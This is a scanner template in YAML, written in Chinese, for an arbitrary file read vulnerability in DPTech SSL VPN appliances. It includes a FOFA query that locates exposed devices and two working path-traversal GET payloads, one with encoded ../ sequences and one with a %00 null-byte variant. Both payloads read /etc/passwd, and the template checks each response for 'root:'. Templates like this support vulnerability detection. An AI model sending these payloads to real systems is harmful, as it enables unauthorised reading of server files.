product: DPTech-VPN
vName: 迪普DPTech VPN 任意文件读取_2023
type: 文件读取
vID: [ ]
level: 3
vDesc: 杭州迪普科技股份有限公司DPTech VPN 存在任意文件读取漏洞，攻击者可以构造恶意请求，通过漏洞读取服务器上的任意文件。
version: DPTech-VPN
note: ''
search:
  FOFA: app="DPtech-SSLVPN"
protocol: http
link: https://blog.csdn.net/qq_53003652/article/details/134420311
fix:
  - 升级到最新版本
model: ''
logic: or
exploit:
  - exp:
      method: get
      follow: false
      path: /..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - 'root:'
            logic: and
        - body:
            value:
              - /bin/
            logic: and
  - exp:
      method: get
      follow: false
      path: /.%00.%2F.%00.%2F.%00.%2F.%00.%2F.%00.%2F.%00.%2F.%00.%2Fetc%2Fpasswd
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - 'root:'
            logic: and
        - body:
            value:
              - /bin/
            logic: and